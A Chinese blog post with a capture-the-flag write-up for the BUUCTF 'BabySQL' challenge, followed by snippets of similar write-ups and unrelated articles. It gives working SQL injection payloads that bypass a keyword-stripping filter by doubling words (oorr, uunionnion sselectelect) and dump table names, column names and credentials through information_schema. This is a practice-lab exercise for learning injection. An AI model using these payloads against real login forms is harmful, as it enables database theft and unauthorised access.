buuctf babySQL

最新推荐文章于 2024-10-30 10:59:51 发布
最新推荐文章于 2024-10-30 10:59:51 发布
阅读量81 收藏
点赞数
文章标签: servlet 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_74020399/article/details/130039660
版权

打开题目发现和之前作的界面类似

尝试万能密码登入

在这里插入图片描述

 输入一些常用的注入语句发现报错的都为输入的部分,说明没报错的语句没了或者被替换成了无效语句,这里考滤一下replace函数

username尝试输入1'%23(就是1'#的意思)

发现1‘#回显为1'%23即1’#可以使用只是前面有什么使后面的语句失效,大胆猜测是将前面的关键语句替换成空尝试输入1‘or 1=1;发现任然报错,但当输入1' oorr 1=1时发现登入成功

(这里是利用双写绕过replace函数的替换)

 

之后进行测试发现replace了or,from,where,select,and,by,union 

代换上面函数进行爆表:

?username=admin' oorrder bbyy 3;%23&password=1

显示登陆成功

 将3换为4显示登陆失败即一共有三列

再进行爆列:

?username=1' uunionnion sselectelect 1,2,3;%23&password=1

显示回显在2,3列

继续进行爆破:

?username=1' uunionnion sselectelect 1,2,group_concat(table_name) ffromrom infoorrmation_schema.tables wwherehere table_schema=database()%23&password=1


?username=1' uunionnion sselectelect 1,2,group_concat(column_name) ffromrom infoorrmation_schema.columns wwherehere table_schema=database() aandnd table_name='b4bsql' %23&password=1

 

将第三列也爆出来:

?username=1' uunionnion sselectelect 1,2,group_concat(id,username,passwoorrd) ffromrom b4bsql %23&password=1

 便可以发现flag在第三列中

 

 

梅琳娜等等我
关注
[极客大挑战 2019]BabySQL 1
qq_43618536的博客
07-02 430
BUUCTF的[极客大挑战 2019]BabySQL 1
[极客大挑战 2019]BabySQL
qq_53689523的博客
02-20 135
根据’134’,我们知道后端使用单引号闭合,而且我们更加确定后端sql语句是。这里提示报错时,我们发现我们输入的and和or都没了,猜测后端应该时匹配到and和or以后,就把他们删除了,所以我们采用双关键词绕过,构造包如下。发现返回三个值时,会显示登录成功,其余情况都显示下标不对,所以应该返回三个值,而且,如果语句正确,会返回登录成功,否则会返回报错。所以,做到这里,我们就知道本题是一道 双关键词过滤的sql注类题目。我们再加长一下条件,测试一下是否过滤了某些关键词。获取每个表的字段中的数据。
buuctf Babysql
zzqzzq11的博客
08-06 265
buuctf
buuctf BabySQL+HardSQL
硫酸超的博客
11-20 3894
cbuuctf BabySQL 1、进入登录页面 2、随便输入 发现用户名和密码错误 3、尝试判断是否为字符型注入 根据报错,确定为单引号字符型注入,密码处也尝试了一下,发现也是单引号字符型注入,说明有2处注入漏洞 4、尝试万能密码 1’ or 1=1-- 发现or被过滤了 尝试双写or 成功绕过 这里说下双写or为什么可以绕过 因为这个网页只对or进行一次过滤,即将字符串中的or替换为空,但是我们可以双写or去绕过,我们也可以用||去代替or 但是发现这个密码并没有用 5、测试有哪些关键字
buuctf-BabySQL
m0_62094846的博客
11-11 372
可以看到or不见了,再联系网页中所说进行过滤,可能是过滤掉了一些注入语句的关键词,但是到底过滤了哪些是个问题 过滤掉了or 和by 用oorrder bbyy,就可以在系统过滤后得到order by 有3段数据 接下来查数据库 系统又过滤了union select from被过滤了,注意information的or也是被过滤的 接下来查表,先试试ctf where也被过滤了 后面查不出结果,到时候再试试 看wp,把字段放在密码后面 ...
BUUCTFBabySQL[极客大挑战 2019]
金 帛的博客
06-11 472
BUUCTF记录贴
BUUCTF-BabySQl
m0_74167420的博客
03-17 384
数据库名为geek.
BUUCTF web BabySQL
于高山之巅,方见大河奔涌;于群峰之上,更觉长风浩荡。
12-18 92
进入靶场,老办法随便输入看一下。
BUUCTF [极客大挑战 2019]BabySQL
m0_49025459的博客
05-15 587
打开环境看看,这一个登录界面 尝试万能密码无果,那么我们只能正常尝试注入,先判断列数 1' order by 1# 输入之后发生报错 发现这里or被过滤掉了 ,这里不论是大写还是小写的or都被过滤了,但是在尝试双写绕过的时候成功了 username:admin' oorr '1'='1# password:123 这样我们就可以尝试又多少列了,但是我们在尝试的时候发现order,or,by都被过滤掉了,所以我们只能通过其他的方式进行测试。但是我们在测试的时候发现union,sel
BUUCTF [极客大挑战 2019] BabySQL
Senimo
03-25 4027
BUUCTF [极客大挑战 2019] BabySQL 启动靶机,打开环境: 尝试登陆: 因为前两次的题目BUUCTF 极客大挑战 2019 EasySQL和均用万能密码登陆成功,再次尝试: /check.php ?username=admin' or '1'='1 &password=1 登陆失败,尝试注释掉password内容: /check.php ?username=adm...
BuuCTFBabySQL WP
weixin_51019270的博客
01-11 250
BuuCTFBabySQL WP 一:判断闭合条件 在用户名的位置输入1’显示错误,说明是单引号闭合。开始构造------》 二:构造开始 构造几遍以后构造出可以得到有用信息的网页 看报错信息可以知道,我们的or被屏蔽掉了,去网上查了一下,是被replace给替换成空白字符了。 根据前两题的经验,猜测列数是3。直接上联合查询看能不能报显示位。 成功以后直接老办法,爆库,爆表,爆列。flag还是在password的最后一个。直接上图了 拿到flag。提交然后结束。 ...
BUUCTF-Web】[极客大挑战 2019]BabySQL
weixin_49298681的博客
01-05 285
1.根据提示知道sql注入有严格的过滤;再通过尝试找到绕过的方法为藏字符2.直接获得username和password 但是没有有用的信息3.通过order by的报错知晓有多少列:root =4.寻找回显点:root =>5.获得数据库基本信息:root =>6.通过information_schema数据库爆破table_name + column_names1.root =2.root =7.再根据知道的column_names去获取数据1.root =
buuctf web [极客大挑战 2019]BabySQL
m0_46412682的博客
07-16 991
buuctf web [极客大挑战 2019]BabySQL 开始的页面 随便输入用户名和密码 sql注入,先判断有多少字段 从图中可以看到select和union被过滤了,可以用双写selselectect uniunionon还有的是’单引号和#要编码变成%27 %23,先猜测4个字段,错误 3个字段,成功 ?username=admin&password=123%27ununionion selselectect 1,2,3%20%23 爆库 ?username=admin&
BUUCTF-WriteUp
鱼的博客
02-01 760
title: BUUCTF WriteUp date: 2021-01-16 17:44:59 tags: CTF WriteUP WEB [HCTF 2018]WarmUp 启动环境,打开网址是一张滑稽,没什么用,看一下源码,发现有注释。 访问source.php,直接给了源码,进行代码审计。 分两块,第一块是emmm::checkFile,里面做了一些判断。 第二块是一个include,文件包含,我们要绕过验证,也就是上面的checkFile方法。 hint.php include触发的三个判断.
快速上手 Rust——实用示例
好看资源网的博客
10-28 931
在本节中,我们通过一系列实用示例展示了 Rust 在文件操作、网络请求、并发编程、命令行工具以及数据库操作等方面的应用。通过这些示例,您可以更好地理解 Rust 的特性,并将其应用于您的项目中。在这一节中,我们将通过一系列实用的示例来帮助您更好地理解 Rust 的特性,并展示如何在实际项目中使用这些特性。以下示例将展示如何编写一个简单的命令行工具,该工具能够接收用户输入并执行基本的文本操作。以下是一个简单的命令行工具,它接受用户输入的字符串并返回字符串的长度和反转结果。在这个示例中,我们将使用。
JAVA中的MVC三层架构
最新发布
楠寻寻的博客
10-30 852
MVC(Model-View-Controller)是一种软件设计模式,用于将应用程序分为主要的部分:模型(Model)、视图(View)和控制器(Controller)。这种架构有助于提高代码的可维护性和可扩展性。Spring框架通过@Controller@Service和注解清晰地划分了MVC三层架构的各个层次,使得开发人员能够更高效地构建和维护复杂的Web应用。POJO类:用于表示业务实体,通常包含属性和相关的getter/setter方法。DAO类:用于封装对数据库的操作,提供数据访问的接口。
ElasticSearch 入门需要了解的概念
TechCraftsman数据库专栏
10-26 1197
ElasticSearch 入门需要了解的概念
ssm智慧社区电子商务系统+vue
weixin_44832324的博客
10-28 1217
系统能否进行正常工作,功能模块能否实现,程序代码是否有错误,这些都需要通过系统测试来进行判断,测试是程序开发中必不可少的步骤,就算系统一步不差的被开发出来了,但进行测试时总能发现一个之前从没遇到过的问题[26]。在系统开发的整个过程当中都需要不断进行系统测试,根据经验发现,前期的一个小问题,将会酿成后期的一个大问题,所以越早发现,越早解决,才能保证后续的编码、测试和设计能够顺利进行。目前,系统测试所使用的方法主要是黑盒测试,系统测试的目的包括:根据客户的需求来设计用户界面;
SQL Server 可观测最佳实践
观测云的博客
10-28 785
本实践介绍如何通过观测云监控自建的 SQL Server,帮助我们及时识别数据库性能瓶颈和潜在问题,确保数据库高效运行和稳定性。
buuctf wireshark
09-12
根据您提供的引用内容,buuctf wireshark 是一个与buuctf比赛相关的题目。其中,Wireshark 是一个网络封包分析软件,可以用来捕获和分析网络数据包。根据[1]中提供的下载地址,可以下载 Wireshark 软件进行使用。 ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值